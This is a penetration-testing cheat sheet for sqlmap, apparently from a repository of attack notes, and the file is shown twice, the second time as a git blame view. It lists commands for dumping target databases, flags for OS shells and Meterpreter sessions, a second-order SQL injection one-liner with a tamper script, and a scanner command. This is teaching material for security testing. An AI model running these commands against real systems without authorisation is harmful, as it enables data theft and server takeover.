killchain-compendium/Exploits/Databases/SQLmap.md

# SQLmap


* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)

## Usage

* Use `-r` with a saved HTTP request 
```sh
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
```
* Select form data automatically
```sh
sqlmap -u http://<target-IP>/site.php --forms --dump-all
```
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)


|Parameter|Details|
|---------|-------|
|-r|Uses the intercepted request save as a file|
|--dbms|DBMS of target|
|--dump|Dump the entire database|
|--dump-all|Dump everything|
|-p |TESTPARAMETER|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|--tables|Show tables|
|-T|Specify table|

### Advanced Features

#### Second Order SQL Injection 

In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)


An example oneliner including a tamper script and a first and second request captured in Burpsuite
```sh
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
```
The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.

Dump the databases, tables afterwards


## Other Tools

### Damn Small SQLi Scanner (DSSS)
* [Script](https://github.com/stamparm/DSSS.git)
```sh
python dsss.py -u "http://example.com/index.php?id="
```

### Online sqlmap
* [Link](https://suip.biz/?act=sqlmap)
restructured Exploits 2022-11-13 22:38:01 +01:00			`# SQLmap`


			`* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)`
sqli 2023-02-19 20:16:49 +01:00			`* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)`
restructured Exploits 2022-11-13 22:38:01 +01:00			`* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)`
			`* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)`

			`## Usage`

			* Use `-r` with a saved HTTP request
			```sh
			`sqlmap -r request.txt --dbms=mysql --dump`
			`sqlmap -r request.txt --batch`
			```
			`* Select form data automatically`
			```sh
			`sqlmap -u http://<target-IP>/site.php --forms --dump-all`
			```
			`* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)`


			`\|Parameter\|Details\|`
			`\|---------\|-------\|`
			`\|-r\|Uses the intercepted request save as a file\|`
			`\|--dbms\|DBMS of target\|`
			`\|--dump\|Dump the entire database\|`
			`\|--dump-all\|Dump everything\|`
			`\|-p \|TESTPARAMETER\|`
			`\|--os-shell\|Prompt for an interactive operating system shell\|`
			`\|--os-pwn\|Prompt for an OOB shell, Meterpreter or VNC\|`
			`\|--tables\|Show tables\|`
			`\|-T\|Specify table\|`

sqli 2023-02-19 20:16:49 +01:00			`### Advanced Features`

			`#### Second Order SQL Injection`

			`In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)`


			`An example oneliner including a tamper script and a first and second request captured in Burpsuite`
			```sh
			`sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql`
			```
			The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.

			`Dump the databases, tables afterwards`


restructured Exploits 2022-11-13 22:38:01 +01:00			`## Other Tools`

			`### Damn Small SQLi Scanner (DSSS)`
			`* [Script](https://github.com/stamparm/DSSS.git)`
			```sh
			`python dsss.py -u "http://example.com/index.php?id="`
			```

			`### Online sqlmap`
			`* [Link](https://suip.biz/?act=sqlmap)`